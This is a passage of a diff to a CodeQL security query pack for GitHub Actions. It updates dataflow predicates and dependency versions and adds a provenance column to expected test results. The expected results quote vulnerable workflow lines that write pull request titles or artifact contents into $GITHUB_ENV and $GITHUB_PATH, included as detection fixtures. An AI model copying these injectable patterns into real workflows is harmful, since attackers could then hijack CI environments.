simple local flow step that should always preserve the call context (same callable) + * This is the local flow predicate that is used as a building block in global + * data flow. */ -predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFrom, nodeTo) } +cached +predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo, string model) { + localFlowStep(nodeFrom, nodeTo) and model = "" +} /** * Holds if data can flow from `node1` to `node2` through a non-local step @@ -366,11 +392,6 @@ predicate clearsContent(Node n, ContentSet c) { none() } */ predicate expectsContent(Node n, ContentSet c) { none() } -/** - * Holds if the node `n` is unreachable when the call context is `call`. - */ -predicate isUnreachableInCall(Node n, DataFlowCall call) { none() } - /** * Holds if flow is allowed to pass from parameter `p` and back to itself as a * side-effect, resulting in a summary from `p` to itself. @@ -400,3 +421,7 @@ predicate additionalLambdaFlowStep(Node nodeFrom, Node nodeTo, boolean preserves * This compression is normally done to not show SSA steps, casts, etc. */ predicate neverSkipInPathGraph(Node node) { any() } + +predicate knownSourceModel(Node source, string model) { none() } + +predicate knownSinkModel(Node sink, string model) { none() } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 87e8124db916..96568f86db33 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -178,7 +178,7 @@ class FieldContent extends Content, TFieldContent { predicate hasLocalFlow(Node n1, Node n2) { n1 = n2 or - simpleLocalFlowStep(n1, n2) or + simpleLocalFlowStep(n1, n2, _) or exists(ContentSet c | ctxFieldReadStep(n1, n2, c)) } diff --git a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll index c2d51748f20f..2fd062e76607 100644 --- a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll +++ b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll @@ -3,9 +3,10 @@ * Implementation of https://github.com/github/codeql/blob/main/shared/dataflow/codeql/dataflow/TaintTracking.qll */ +private import codeql.Locations private import codeql.dataflow.TaintTracking private import DataFlowImplSpecific -module ActionsTaintTracking implements InputSig { +module ActionsTaintTracking implements InputSig { import TaintTrackingPrivate } diff --git a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll index a7e0d23df2b4..b8647339d24c 100644 --- a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll @@ -14,12 +14,16 @@ private import codeql.actions.Ast */ predicate defaultTaintSanitizer(DataFlow::Node node) { none() } +// predicate defaultAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) { +// any(AdditionalTaintStep s).step(nodeFrom, nodeTo) +// } /** * Holds if the additional step from `nodeFrom` to `nodeTo` should be included * in all global taint flow configurations. */ -predicate defaultAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) { - any(AdditionalTaintStep s).step(nodeFrom, nodeTo) +cached +predicate defaultAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo, string model) { + any(AdditionalTaintStep s).step(nodeFrom, nodeTo) and model = "" } /** diff --git a/ql/lib/qlpack.gbo b/ql/lib/qlpack.gbo deleted file mode 100644 index c77f7924c126..000000000000 --- a/ql/lib/qlpack.gbo +++ /dev/null @@ -1,13 +0,0 @@ ---- -warnOnImplicitThis: false -name: seclab/actions-all -version: 0.0.1-dev -groups: actions -extractor: actions -library: true -tests: test -dependencies: - codeql/javascript-all: ^0.8.7 - "codeql/controlflow": "*" - "codeql/dataflow": "*" - "codeql/ssa": "*" diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index bf05e80e0a60..48045dbf6792 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -4,10 +4,10 @@ warnOnImplicitThis: true name: githubsecuritylab/actions-all version: 0.0.33 dependencies: - codeql/util: ^0.2.0 - codeql/yaml: ^0.1.2 - codeql/controlflow: ^0.1.0 - codeql/dataflow: ^0.1.0 + codeql/util: ^1.0.0 + codeql/yaml: ^1.0.0 + codeql/controlflow: ^1.0.0 + codeql/dataflow: ^1.0.0 dbscheme: yaml.dbscheme extractor: yaml groups: diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml index 84a6ccba26dc..4b8239b7f6ca 100644 --- a/ql/test/codeql-pack.lock.yml +++ b/ql/test/codeql-pack.lock.yml @@ -2,15 +2,15 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 0.1.8 + version: 1.0.0 codeql/dataflow: - version: 0.1.8 + version: 1.0.0 codeql/ssa: - version: 0.2.8 + version: 1.0.0 codeql/typetracking: - version: 0.2.8 + version: 1.0.0 codeql/util: - version: 0.2.8 + version: 1.0.0 codeql/yaml: - version: 0.1.5 + version: 1.0.0 compiled: false diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected index 31e367ac3175..0a5bfe433e91 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected @@ -1,8 +1,8 @@ edges -| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:18:28:43 | inputs.who-to-greet | -| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | -| action1/action.yml:24:7:31:4 | Uses Step: replace [value] | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | -| action1/action.yml:28:18:28:43 | inputs.who-to-greet | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:18:28:43 | inputs.who-to-greet | provenance | | +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | provenance | | +| action1/action.yml:24:7:31:4 | Uses Step: replace [value] | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | provenance | | +| action1/action.yml:28:18:28:43 | inputs.who-to-greet | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | provenance | | nodes | action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | semmle.label | Uses Step: replace [value] | diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected index 6540b1910682..87c185fb5e12 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected @@ -1,7 +1,7 @@ edges -| action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | -| action1/action.yml:44:7:48:70 | Run Step: source [tainted] | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | -| action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | +| action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | provenance | | +| action1/action.yml:44:7:48:70 | Run Step: source [tainted] | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | provenance | | +| action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | provenance | | nodes | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | semmle.label | steps.source.outputs.tainted | | action1/action.yml:42:7:44:4 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected index 063a26bd6ef6..067edb68bb1c 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected @@ -1,7 +1,7 @@ edges -| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:30:41:55 | inputs.who-to-greet | -| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | -| action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:30:41:55 | inputs.who-to-greet | provenance | | +| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | provenance | | +| action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | provenance | | nodes | action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | semmle.label | steps.reflector.outputs.reflected | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected index a45b9acf416d..f2178960774e 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected @@ -1,5 +1,5 @@ edges -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | provenance | | nodes | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | semmle.label | inputs.config-path | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected index 2cabeaca9faa..c76034f74d46 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected @@ -1,7 +1,7 @@ edges -| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | -| .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | -| .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | provenance | | +| .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | provenance | | +| .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | provenance | | nodes | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | semmle.label | jobs.job1.outputs.job-output2 | | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | semmle.label | Job outputs node [job-output2] | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected index a6be99e1bd05..8589d82d8259 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected @@ -1,9 +1,9 @@ edges -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | -| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | -| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | -| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | provenance | | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | provenance | | +| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | provenance | | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | provenance | | +| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | provenance | | nodes | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | semmle.label | jobs.job1.outputs.job-output1 | diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected index c6091f1fc239..7fab238795c6 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected @@ -1,10 +1,10 @@ edges -| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | -| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | -| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | -| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | nodes | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | semmle.label | echo $(echo "$PATHINJ") >> $GITHUB_PATH | diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected index d3b90de71e32..ea360bc56df0 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected @@ -1,10 +1,10 @@ edges -| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | -| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | -| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | -| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | nodes | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | semmle.label | echo $(echo "$PATHINJ") >> $GITHUB_PATH | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index ffaaf91e5504..0dbff9553183 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected @@ -1,16 +1,16 @@ edges -| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | -| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | -| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | -| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | -| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | provenance | | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 28fffe0e5e4d..5641ea53afd2 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected @@ -1,16 +1,16 @@ edges -| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | -| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | -| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | -| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | -| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | provenance | | +| 